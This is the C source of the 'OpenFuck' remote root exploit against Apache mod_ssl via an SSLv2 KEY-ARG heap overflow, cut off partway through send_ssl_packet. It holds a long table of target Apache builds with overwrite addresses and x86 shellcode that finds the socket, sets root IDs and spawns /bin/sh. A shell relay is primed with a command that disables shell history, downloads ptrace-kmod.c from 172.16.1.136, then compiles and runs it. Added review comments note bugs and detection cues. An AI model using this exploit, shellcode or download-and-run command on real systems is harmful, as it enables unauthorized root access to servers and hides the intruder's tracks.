  1. /*
* Successful compile on Kali-Linux-2018.4-vm-amd64
  3. * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
  4. *
  5. * OF version r00t VERY PRIV8 spabam
  6. * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
  7. * objdump -R /usr/sbin/httpd|grep free to get more targets
  8. * #hackarena irc.brasnet.org
  9. */
  10.  
  11. #include <arpa/inet.h>
  12. #include <netinet/in.h>
  13. #include <sys/types.h>
  14. #include <sys/socket.h>
  15. #include <netdb.h>
  16. #include <errno.h>
  17. #include <string.h>
  18. #include <stdio.h>
  19. #include <unistd.h>
  20.  
  21. #include <openssl/ssl.h>
  22. #include <openssl/rsa.h>
  23. #include <openssl/x509.h>
  24. #include <openssl/evp.h>
  25. #include <openssl/rc4.h>
  26. #include <openssl/md5.h>
  27.  
  28. #define SSL2_MT_ERROR 0
  29. #define SSL2_MT_CLIENT_FINISHED 3
  30. #define SSL2_MT_SERVER_HELLO 4
  31. #define SSL2_MT_SERVER_VERIFY 5
  32. #define SSL2_MT_SERVER_FINISHED 6
  33. #define SSL2_MAX_CONNECTION_ID_LENGTH 16
  34.  
  35. /* update this if you add architectures */
  36. #define MAX_ARCH 138
  37.  
/*
 * Target table: each entry pairs a distribution/Apache build string with the
 * address the overwrite is aimed at on that build (per the header comment,
 * taken from `objdump -R /usr/sbin/httpd | grep free`, i.e. a relocation slot).
 * NOTE(review): func_addr is a signed int; the 0xbf...... entries and
 * 0x08086ec89 do not fit in a 32-bit int and rely on implementation-defined
 * conversion, and three entries are written with nine hex digits (likely
 * typos). By count the table holds 139 entries while MAX_ARCH above is 138 —
 * verify how the (not visible here) selection code uses the bound.
 */
struct archs {
    char* desc;    /* human-readable target name */
    int func_addr; /* objdump -R /usr/sbin/httpd | grep free */
} architectures[] = {
    { "Caldera OpenLinux (apache-1.3.26)", 0x080920e0 },
    { "Cobalt Sun 6.0 (apache-1.3.12)", 0x8120f0c },
    { "Cobalt Sun 6.0 (apache-1.3.20)", 0x811dcb8 },
    { "Cobalt Sun x (apache-1.3.26)", 0x8123ac3 },
    { "Cobalt Sun x Fixed2 (apache-1.3.26)", 0x81233c3 },
    { "Conectiva 4 (apache-1.3.6)", 0x08075398 },
    { "Conectiva 4.1 (apache-1.3.9)", 0x0808f2fe },
    { "Conectiva 6 (apache-1.3.14)", 0x0809222c },
    { "Conectiva 7 (apache-1.3.12)", 0x0808f874 },
    { "Conectiva 7 (apache-1.3.19)", 0x08088aa0 },
    { "Conectiva 7/8 (apache-1.3.26)", 0x0808e628 },
    { "Conectiva 8 (apache-1.3.22)", 0x0808b2d0 },
    { "Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)", 0x08095264 },
    { "Debian GNU Linux (apache_1.3.19-1)", 0x080966fc },
    { "Debian GNU Linux (apache_1.3.22-2)", 0x08096aac },
    { "Debian GNU Linux (apache-1.3.22-2.1)", 0x08083828 },
    { "Debian GNU Linux (apache-1.3.22-5)", 0x08083728 },
    { "Debian GNU Linux (apache_1.3.23-1)", 0x08085de8 },
    { "Debian GNU Linux (apache_1.3.24-2.1)", 0x08087d08 },
    { "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)", 0x080873ac },
    { "Debian GNU Linux (apache_1.3.24-3)", 0x08087d68 },
    { "Debian GNU Linux (apache-1.3.26-1)", 0x0080863c4 },
    { "Debian GNU Linux 3.0 Woody (apache-1.3.26-1)", 0x080863cc },
    { "Debian GNU Linux (apache-1.3.27)", 0x0080866a3 },

    { "FreeBSD (apache-1.3.9)", 0xbfbfde00 },
    { "FreeBSD (apache-1.3.11)", 0x080a2ea8 },
    { "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 },
    { "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 },
    { "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c },
    { "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 },
    { "FreeBSD (apache-1.3.12)", 0x0809bd7c },
    { "FreeBSD (apache-1.3.14)", 0xbfbfdc00 },
    { "FreeBSD (apache-1.3.14)", 0x080ab68c },
    { "FreeBSD (apache-1.3.14)", 0x0808c76c },
    { "FreeBSD (apache-1.3.14)", 0x080a3fc8 },
    { "FreeBSD (apache-1.3.14)", 0x080ab6d8 },
    { "FreeBSD (apache-1.3.17_1)", 0x0808820c },
    { "FreeBSD (apache-1.3.19)", 0xbfbfdc00 },
    { "FreeBSD (apache-1.3.19_1)", 0x0808c96c },
    { "FreeBSD (apache-1.3.20)", 0x0808cb70 },
    { "FreeBSD (apache-1.3.20)", 0xbfbfc000 },
    { "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 },
    { "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 },
    { "FreeBSD (apache-1.3.22)", 0xbfbfc000 },
    { "FreeBSD (apache-1.3.22_7)", 0x0808d110 },
    { "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 },
    { "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 },
    { "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 },
    { "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c },
    { "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec },
    { "FreeBSD (apache-1.3.27)", 0x080902e4 },

    { "Gentoo Linux (apache-1.3.24-r2)", 0x08086c34 },
    { "Linux Generic (apache-1.3.14)", 0xbffff500 },
    { "Mandrake Linux X.x (apache-1.3.22-10.1mdk)", 0x080808ab },
    { "Mandrake Linux 7.1 (apache-1.3.14-2)", 0x0809f6c4 },
    { "Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)", 0x0809d233 },
    { "Mandrake Linux 7.2 (apache-1.3.14-2mdk)", 0x0809f6ef },
    { "Mandrake Linux 7.2 (apache-1.3.14) 2", 0x0809d6c4 },
    { "Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)", 0x0809ccde },
    { "Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)", 0x0809ce14 },
    { "Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)", 0x0809d262 },
    { "Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)", 0x08083545 },
    { "Mandrake Linux 8.0 (apache-1.3.19-3)", 0x0809ea98 },
    { "Mandrake Linux 8.1 (apache-1.3.20-3)", 0x0809e97c },
    { "Mandrake Linux 8.2 (apache-1.3.23-4)", 0x08086580 },
    { "Mandrake Linux 8.2 #2 (apache-1.3.23-4)", 0x08086484 },
    { "Mandrake Linux 8.2 (apache-1.3.24)", 0x08086665 },
    { "Mandrake Linux 9 (apache-1.3.26)", 0x0808b864 },
    { "RedHat Linux ?.? GENERIC (apache-1.3.12-1)", 0x0808c0f4 },
    { "RedHat Linux TEST1 (apache-1.3.12-1)", 0x0808c0f4 },
    { "RedHat Linux TEST2 (apache-1.3.12-1)", 0x0808c0f4 },
    { "RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)", 0x080d2c35 },
    { "RedHat Linux 4.2 (apache-1.1.3-3)", 0x08065bae },
    { "RedHat Linux 5.0 (apache-1.2.4-4)", 0x0808c82c },
    { "RedHat Linux 5.1-Update (apache-1.2.6)", 0x08092a45 },
    { "RedHat Linux 5.1 (apache-1.2.6-4)", 0x08092c2d },
    { "RedHat Linux 5.2 (apache-1.3.3-1)", 0x0806f049 },
    { "RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)", 0x0808e4d8 },
    { "RedHat Linux 6.0 (apache-1.3.6-7)", 0x080707ec },
    { "RedHat Linux 6.0 (apache-1.3.6-7)", 0x080707f9 },
    { "RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)", 0x0808fd52 },
    { "RedHat Linux 6.0 Update (apache-1.3.24)", 0x80acd58 },
    { "RedHat Linux 6.1 (apache-1.3.9-4)1", 0x0808ccc4 },
    { "RedHat Linux 6.1 (apache-1.3.9-4)2", 0x0808ccdc },
    { "RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)", 0x0808fd5d },
    { "RedHat Linux 6.1-fp2000 (apache-1.3.26)", 0x082e6fcd },
    { "RedHat Linux 6.2 (apache-1.3.12-2)1", 0x0808f689 },
    { "RedHat Linux 6.2 (apache-1.3.12-2)2", 0x0808f614 },
    { "RedHat Linux 6.2 mod(apache-1.3.12-2)3", 0xbffff94c },
    { "RedHat Linux 6.2 update (apache-1.3.22-5.6)1", 0x0808f9ec },
    { "RedHat Linux 6.2-Update (apache-1.3.22-5.6)2", 0x0808f9d4 },
    { "Redhat Linux 7.x (apache-1.3.22)", 0x0808400c },
    { "RedHat Linux 7.x (apache-1.3.26-1)", 0x080873bc },
    { "RedHat Linux 7.x (apache-1.3.27)", 0x08087221 },
    { "RedHat Linux 7.0 (apache-1.3.12-25)1", 0x0809251c },
    { "RedHat Linux 7.0 (apache-1.3.12-25)2", 0x0809252d },
    { "RedHat Linux 7.0 (apache-1.3.14-2)", 0x08092b98 },
    { "RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)", 0x08084358 },
    { "RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)", 0x0808438c },
    { "RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)", 0x08086e41 },
    { "RedHat Linux 7.1 (apache-1.3.19-5)1", 0x0809af8c },
    { "RedHat Linux 7.1 (apache-1.3.19-5)2", 0x0809afd9 },
    { "RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)", 0x0808438c },
    { "RedHat Linux 7.1-Update (1.3.22-5.7.1)", 0x08084389 },
    { "RedHat Linux 7.1 (apache-1.3.22-src)", 0x0816021c },
    { "RedHat Linux 7.1-Update (1.3.27-1.7.1)", 0x08086ec89 },
    { "RedHat Linux 7.2 (apache-1.3.20-16)1", 0x080994e5 },
    { "RedHat Linux 7.2 (apache-1.3.20-16)2", 0x080994d4 },
    { "RedHat Linux 7.2-Update (apache-1.3.22-6)", 0x08084045 },
    { "RedHat Linux 7.2 (apache-1.3.24)", 0x80b0938 },
    { "RedHat Linux 7.2 (apache-1.3.26)", 0x08161c16 },
    { "RedHat Linux 7.2 (apache-1.3.26-snc)", 0x8161c14 },
    { "Redhat Linux 7.2 (apache-1.3.26 w/PHP)1", 0x08269950 },
    { "Redhat Linux 7.2 (apache-1.3.26 w/PHP)2", 0x08269988 },
    { "RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)", 0x08086af9 },
    { "RedHat Linux 7.3 (apache-1.3.23-11)1", 0x0808528c },
    { "RedHat Linux 7.3 (apache-1.3.23-11)2", 0x0808525f },
    { "RedHat Linux 7.3 (apache-1.3.27)", 0x080862e4 },
    { "RedHat Linux 8.0 (apache-1.3.27)", 0x08084c1c },
    { "RedHat Linux 8.0-second (apache-1.3.27)", 0x0808151e },
    { "RedHat Linux 8.0 (apache-2.0.40)", 0x08092fa4 },
    { "Slackware Linux 4.0 (apache-1.3.6)", 0x08088130 },
    { "Slackware Linux 7.0 (apache-1.3.9)", 0x080a7fc0 },
    { "Slackware Linux 7.0 (apache-1.3.26)", 0x083d37fc },
    { "Slackware 7.0 (apache-1.3.26)2", 0x083d2232 },
    { "Slackware Linux 7.1 (apache-1.3.12)", 0x080a86a4 },
    { "Slackware Linux 8.0 (apache-1.3.20)", 0x080ae67c },
    { "Slackware Linux 8.1 (apache-1.3.24)", 0x080b0c60 },
    { "Slackware Linux 8.1 (apache-1.3.26)", 0x080b2100 },
    { "Slackware Linux 8.1-stable (apache-1.3.26)", 0x080b0c60 },
    { "Slackware Linux (apache-1.3.27)", 0x080b1a3a },
    { "SuSE Linux 7.0 (apache-1.3.12)", 0x0809f54c },
    { "SuSE Linux 7.1 (apache-1.3.17)", 0x08099984 },
    { "SuSE Linux 7.2 (apache-1.3.19)", 0x08099ec8 },
    { "SuSE Linux 7.3 (apache-1.3.20)", 0x08099da8 },
    { "SuSE Linux 8.0 (apache-1.3.23)", 0x08086168 },
    { "SUSE Linux 8.0 (apache-1.3.23-120)", 0x080861c8 },
    { "SuSE Linux 8.0 (apache-1.3.23-137)", 0x080861c8 },
    /* unverified: this target would need different (PPC) shellcode */
    { "Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)", 0xfd42630 },
};
  518.  
/* NOTE(review): C requires errno to be a macro and <errno.h> is already
 * included above, so this extern declaration is obsolete (it only compiles
 * because the macro expansion happens to yield a valid declaration on glibc). */
extern int errno;

/* file-scope globals; neither is read or written anywhere in the visible part of the file */
int cipher;
int ciphers;
  523.  
/* the offset of the local port from the beginning of the overwrite_next_chunk buffer */
  525. #define FINDSCKPORTOFS 208 + 12 + 46
  526.  
/* First KEY-ARG payload: 4 + 48 filler bytes covering the two fields of the
 * server-side session structure named in the trailing comments, then a
 * session-id length of 0x70 (little-endian). Each "AAAA" group is one 4-byte
 * field; the field names are the author's annotation of what gets overwritten. */
unsigned char overwrite_session_id_length[] =
    "AAAA" /* int master key length; */
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
    "\x70\x00\x00\x00"; /* unsigned int session id length; */
  531.  
/* Second KEY-ARG payload, in three parts (see the inline annotations):
 *  1. filler for the server-side session structure fields, with the pointer
 *     fields (sess_cert, peer, cipher, ciphers, ex_data) zeroed and
 *     references set to 1;
 *  2. a forged heap chunk header whose "fdfd"/"bkbk" placeholders are the
 *     forward/back pointers the allocator's unlink step consumes (per the
 *     "overwritten with FD by the unlink macro" comment below);
 *  3. the shellcode: a 10-byte jump over the bytes the unlink clobbers,
 *     LSD-pl's findsckcode (walks file descriptors comparing each local port
 *     against the 0x1234 placeholder — presumably the value patched in at
 *     FINDSCKPORTOFS), setresuid(0,0,0), then execl("/bin/sh").
 * The fixed NOP/jump prologue and findsckcode bytes are a static pattern a
 * network IDS can match on the wire, since SSLv2 CLIENT-MASTER-KEY is sent
 * before encryption starts. */
unsigned char overwrite_next_chunk[] =
    "AAAA" /* int master key length; */
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
    "AAAA" /* unsigned int session id length; */
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
    "AAAA" /* unsigned int sid ctx length; */
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
    "AAAA" /* int not resumable; */
    "\x00\x00\x00\x00" /* struct sess cert st *sess cert; */
    "\x00\x00\x00\x00" /* X509 *peer; */
    "AAAA" /* long verify result; */
    "\x01\x00\x00\x00" /* int references; */
    "AAAA" /* int timeout; */
    "AAAA" /* int time */
    "AAAA" /* int compress meth; */
    "\x00\x00\x00\x00" /* SSL CIPHER *cipher; */
    "AAAA" /* unsigned long cipher id; */
    "\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */
    "\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */
    "AAAAAAAA" /* struct ssl session st *prev,*next; */

    "\x00\x00\x00\x00" /* Size of previous chunk */
    "\x11\x00\x00\x00" /* Size of chunk, in bytes */
    "fdfd" /* Forward and back pointers */
    "bkbk"
    "\x10\x00\x00\x00" /* Size of previous chunk */
    "\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */

    /* shellcode start */
    "\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */

    /* 72 bytes findsckcode by LSD-pl */
    "\x31\xdb" /* xorl %ebx,%ebx */
    "\x89\xe7" /* movl %esp,%edi */
    "\x8d\x77\x10" /* leal 0x10(%edi),%esi */
    "\x89\x77\x04" /* movl %esi,0x4(%edi) */
    "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
    "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
    "\xb3\x10" /* movb $0x10,%bl */
    "\x89\x19" /* movl %ebx,(%ecx) */
    "\x31\xc9" /* xorl %ecx,%ecx */
    "\xb1\xff" /* movb $0xff,%cl */
    "\x89\x0f" /* movl %ecx,(%edi) */
    "\x51" /* pushl %ecx */
    "\x31\xc0" /* xorl %eax,%eax */
    "\xb0\x66" /* movb $0x66,%al */
    "\xb3\x07" /* movb $0x07,%bl */
    "\x89\xf9" /* movl %edi,%ecx */
    "\xcd\x80" /* int $0x80 */
    "\x59" /* popl %ecx */
    "\x31\xdb" /* xorl %ebx,%ebx */
    "\x39\xd8" /* cmpl %ebx,%eax */
    "\x75\x0a" /* jne <findsckcode+54> */
    "\x66\xb8\x12\x34" /* movw $0x1234,%bx -- placeholder port value */
    "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */
    "\x74\x02" /* je <findsckcode+56> */
    "\xe2\xe0" /* loop <findsckcode+24> */
    "\x89\xcb" /* movl %ecx,%ebx */
    "\x31\xc9" /* xorl %ecx,%ecx */
    "\xb1\x03" /* movb $0x03,%cl */
    "\x31\xc0" /* xorl %eax,%eax */
    "\xb0\x3f" /* movb $0x3f,%al */
    "\x49" /* decl %ecx */
    "\xcd\x80" /* int $0x80 */
    "\x41" /* incl %ecx */
    "\xe2\xf6" /* loop <findsckcode+62> */

    /* 10 byte setresuid(0,0,0); by core */
    "\x31\xc9" /* xor %ecx,%ecx */
    "\xf7\xe1" /* mul %ecx,%eax */
    "\x51" /* push %ecx */
    "\x5b" /* pop %ebx */
    "\xb0\xa4" /* mov $0xa4,%al */
    "\xcd\x80" /* int $0x80 */


    /* bigger shellcode added by spabam (left disabled by the author) */

    /* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69"
    "\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80"
    */


    /* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
    "\x31\xc0" /* xorl %eax,%eax */
    "\x50" /* pushl %eax */
    "\x68""//sh" /* pushl $0x68732f2f */
    "\x68""/bin" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp,%ebx */
    "\x50" /* pushl %eax */
    "\x53" /* pushl %ebx */
    "\x89\xe1" /* movl %esp,%ecx */
    "\x99" /* cdql */
    "\xb0\x0b" /* movb $0x0b,%al */
    "\xcd\x80"; /* int $0x80 */
  629.  
  630. /* read and write buffer*/
  631. #define BUFSIZE 16384
  632.  
  633. /* hardcoded protocol stuff */
  634. #define CHALLENGE_LENGTH 16
  635. #define RC4_KEY_LENGTH 16 /* 128 bits */
  636. #define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
  637.  
  638. /* straight from the openssl source */
  639. #define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
  640. #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
  641.  
  642. /* we keep all SSL2 state in this structure */
/* All SSL2 client state for one connection; allocated by ssl_connect_host()
 * and filled in step by step by the handshake functions below. */
typedef struct {
    int sock; /* connected TCP socket, from connect_host() */

    /* client stuff: challenge and master key are generated locally with rand() */
    unsigned char challenge[CHALLENGE_LENGTH];
    unsigned char master_key[RC4_KEY_LENGTH];
    unsigned char key_material[RC4_KEY_MATERIAL_LENGTH]; /* derived by generate_key_material() */

    /* connection id - returned by the server in SERVER-HELLO */
    int conn_id_length;
    unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];

    /* server certificate, parsed in get_server_hello() */
    X509 *x509;

    /* session keys: pointers into key_material plus their RC4 schedules */
    unsigned char* read_key;
    unsigned char* write_key;
    RC4_KEY* rc4_read_key;
    RC4_KEY* rc4_write_key;

    /* sequence numbers, used for MAC calculation (only write_seq is used in the visible code) */
    int read_seq;
    int write_seq;

    /* set to 1 once CLIENT-MASTER-KEY has been sent; records are MAC'ed + RC4'ed from then on */
    int encrypted;
} ssl_conn;
  671.  
  672. #define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
  673. #define COMMAND2 "unset HISTFILE; cd /tmp; wget http://172.16.1.136:8000/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
  674.  
/* Resolve hostname (dotted quad or DNS name) to an IPv4 address in network
 * byte order. Exits the process if gethostbyname() fails.
 * NOTE(review): inet_addr() returns an unsigned 32-bit value; where long is
 * 64 bits the `< 0` test can never be true, so the gethostbyname() path is
 * only reachable on ILP32 builds. */
long getip(char *hostname) {
    long ipaddr = inet_addr(hostname);

    if (ipaddr >= 0) {
        return ipaddr;
    }

    struct hostent *host = gethostbyname(hostname);
    if (host == NULL) {
        perror("gethostbyname()");
        exit(-1);
    }
    memcpy(&ipaddr, host->h_addr, host->h_length);
    return ipaddr;
}
  688.  
  689. /* mixter's code w/enhancements by core */
  690.  
/*
 * Interactive relay between the local terminal and a connected socket.
 * Two priming lines are written first: COMMAND1 (set TERM, exec an
 * interactive bash) and COMMAND2 (wget a ptrace-kmod source from the
 * hard-coded URL in the #define above, compile and run it) — that second
 * stage is a noisy, easily logged action on the remote host. The loop then
 * select()s on stdin and sockfd, forwarding typed lines to the socket and
 * echoing socket data to stdout.
 * Returns 0 when the peer closes the connection, 1 on a read() error; the
 * for(;;) has no other exit, so the missing return after it is unreachable.
 * NOTE(review): rset is never cleared with FD_ZERO, so its indeterminate
 * initial bits persist; the select(), write() and fgets() results are not
 * checked; a full 1024-byte read() leaves rcv without a NUL for fputs().
 */
int sh(int sockfd) {
    char snd[1024], rcv[1024];
    fd_set rset;
    int maxfd, n;

    /* Priming commands */
    strcpy(snd, COMMAND1 "\n");
    write(sockfd, snd, strlen(snd));

    strcpy(snd, COMMAND2 "\n");
    write(sockfd, snd, strlen(snd));

    /* Main command loop */
    for (;;) {
        FD_SET(fileno(stdin), &rset);
        FD_SET(sockfd, &rset);

        maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
        select(maxfd, &rset, NULL, NULL, NULL);

        if (FD_ISSET(fileno(stdin), &rset)) {
            bzero(snd, sizeof(snd));
            fgets(snd, sizeof(snd)-2, stdin);
            write(sockfd, snd, strlen(snd));
        }

        if (FD_ISSET(sockfd, &rset)) {
            bzero(rcv, sizeof(rcv)); /* zero-fill so a short read is NUL-terminated */

            if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
                printf("Good Bye!\n");
                return 0;
            }

            if (n < 0) {
                perror("read");
                return 1;
            }

            fputs(rcv, stdout);
            fflush(stdout); /* keeps output nice */
        }
    } /* for(;;) */
}
  735.  
  736. /* Returns the local port of a connected socket */
/* Returns the local port of a socket exactly as stored in sockaddr_in, i.e.
 * in network byte order (no ntohs()). Prints a message and exits on failure. */
int get_local_port(int sock)
{
    struct sockaddr_in local;
    socklen_t local_len = sizeof local;
    int rc = getsockname(sock, (struct sockaddr *)&local, &local_len);

    if (rc < 0) {
        printf("Can't get local port: %s\n", strerror(errno));
        exit(1);
    }
    return local.sin_port;
}
  749.  
  750. /* Connect to a host */
/* Opens a TCP connection to host:port and returns the connected socket.
 * host is resolved with getip() (dotted quad or DNS name). Socket creation
 * or connect() failure prints a message and exits the process. */
int connect_host(char* host, int port)
{
    struct sockaddr_in peer = {
        .sin_family = AF_INET,
        .sin_port = htons(port),
    };
    peer.sin_addr.s_addr = getip(host);

    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd <= 0) {
        printf("Could not create a socket\n");
        exit(1);
    }

    int rc = connect(fd, (struct sockaddr *)&peer, sizeof(peer));
    if (rc < 0) {
        printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
        exit(1);
    }
    return fd;
}
  772.  
  773. /* Create a new ssl conn structure and connect to a host */
/* Allocates a fresh ssl_conn, connects it to host:port and returns it.
 * Only sock, encrypted and the two sequence counters are initialised here;
 * the key/certificate fields are filled in by the handshake functions.
 * The caller owns the result (it is never freed in the visible code).
 * Allocation failure prints a message and exits. */
ssl_conn* ssl_connect_host(char* host, int port)
{
    ssl_conn* conn = malloc(sizeof *conn);

    if (conn == NULL) {
        printf("Can't allocate memory\n");
        exit(1);
    }

    /* fresh connection: plaintext, both sequence counters at zero */
    conn->encrypted = 0;
    conn->write_seq = 0;
    conn->read_seq = 0;

    conn->sock = connect_host(host, port);
    return conn;
}
  792.  
/* global buffer used by ssl_error() for codes it has no fixed string for */
char res_buf[30]; /* shared scratch for ssl_error(); not thread-safe, overwritten on each unknown code */
  795.  
  796. /* converts an SSL error code to a string */
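/* Converts an SSL2 error code to a printable string.
 * Known codes return static literals; any other code is formatted as hex
 * into the shared res_buf, so that result is only valid until the next
 * call with an unknown code.
 * The 0x04 (BAD CERTIFICATE) label previously read "(0x03)"; the format
 * call is bounded by sizeof res_buf. */
char* ssl_error(int code) {
    switch (code) {
    case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)";
    case 0x01: return "SSL2 PE NO CIPHER (0x01)";
    case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)";
    case 0x04: return "SSL2 PE BAD CERTIFICATE (0x04)";
    case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
    default:
        snprintf(res_buf, sizeof res_buf, "%02x", code);
        return res_buf;
    }
}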
  809.  
  810. /* read len bytes from a socket. boring. */
/* Reads len bytes from sock into buf, exiting the process if read() fails.
 * Returns len.
 * NOTE(review): to_read is decremented by len rather than by the count
 * actually read (l) and buf is never advanced, so the body runs exactly once
 * and the return value is len even when read() delivered fewer bytes (or 0
 * at EOF); callers assume the buffer was completely filled. */
int read_data(int sock, unsigned char* buf, int len)
{
    int l;
    int to_read = len;

    do {
        if ((l = read(sock, buf, to_read)) < 0) {
            printf("Error in read: %s\n", strerror(errno));
            exit(1);
        }
        to_read -= len;
    } while (to_read > 0);

    return len;
}
  826.  
/* reads an SSL packet and decrypts it if necessary */
/* Reads one SSLv2 record into buf and decrypts it if the handshake has
 * already switched to encryption (ssl->encrypted).
 *
 * Returns the number of payload bytes left at buf[0..], or 0 when the record
 * is a 3-byte SSL2 ERROR message (callers then read the 16-bit code from
 * buf[1..2]). Any malformed record prints a message and exits.
 *
 * Framing: if the top bit of the first header byte is clear the header is
 * 3 bytes (14-bit length + padding-length byte), otherwise 2 bytes (15-bit
 * length, no padding). The length is range-checked against buf_size before
 * the body is read, which keeps the read_data() call inside buf.
 *
 * Encrypted records are RC4-decrypted in place; the leading MD5-sized MAC and
 * trailing padding are then dropped by shifting the plaintext to buf[0].
 * NOTE(review): the MAC is stripped, never recomputed and compared, so this
 * client does not detect tampering with server records.
 * NOTE(review): read_data() is relied on to deliver exactly the requested
 * byte count; it does not loop on short reads.
 */
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
{
    int rec_len, padding;

    read_data(ssl->sock, buf, 2);

    if ((buf[0] & 0x80) == 0) {
        /* three byte header: 14-bit length, then one padding-length byte */
        rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
        read_data(ssl->sock, &buf[2], 1);
        padding = (int)buf[2];
    }
    else {
        /* two byte header: 15-bit length, no padding */
        rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
        padding = 0;
    }

    /* bound the body read to the caller's buffer before touching the socket */
    if ((rec_len <= 0) || (rec_len > buf_size)) {
        printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
        exit(1);
    }

    read_data(ssl->sock, buf, rec_len);

    if (ssl->encrypted) {
        if (MD5_DIGEST_LENGTH + padding >= rec_len) {
            if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
                /* the server didn't switch to encryption due to an error */
                return 0;
            }
            else {
                printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
                exit(1);
            }
        }

        /* decrypt the encrypted part of the packet (in place) */
        RC4(ssl->rc4_read_key, rec_len, buf, buf);

        /* drop the leading MAC and trailing padding, moving the plaintext to buf[0];
         * the MAC bytes are discarded, not verified */
        rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
        memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
    }

    /* a plaintext ERROR record is exactly 3 bytes: type + 16-bit code */
    if (buf[0] == SSL2_MT_ERROR) {
        if (rec_len != 3) {
            printf("Malformed server error message\n");
            exit(1);
        }
        else {
            return 0;
        }
    }

    return rec_len;
}
  885.  
  886. /* send an ssl packet, encrypting it if ssl->encrypted is set */
/* Sends one SSLv2 record built from rec[0..rec_len) with a 2-byte header.
 *
 * Plaintext mode: header + rec. Encrypted mode: header + MD5 MAC + rec, with
 * MAC and payload RC4-encrypted in place. The MAC is
 * MD5(write_key || rec || seq), where seq is the 4-byte write sequence
 * number passed through ntohl() (byte-swapped on little-endian hosts).
 * ssl->write_seq is incremented for every record sent, encrypted or not.
 *
 * The total length is checked against BUFSIZE before anything is written
 * into the local buffer.
 * NOTE(review): the send() return value is ignored, so a short send would
 * silently desynchronise the stream.
 */
void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
{
    unsigned char buf[BUFSIZE];
    unsigned char* p;
    int tot_len;
    MD5_CTX ctx;
    int seq;


    if (ssl->encrypted)
        tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */
    else
        tot_len = rec_len;

    if (2 + tot_len > BUFSIZE) {
        printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
        exit(1);
    }

    p = buf;
    s2n(tot_len, p); /* big-endian length; p now points at the record body */

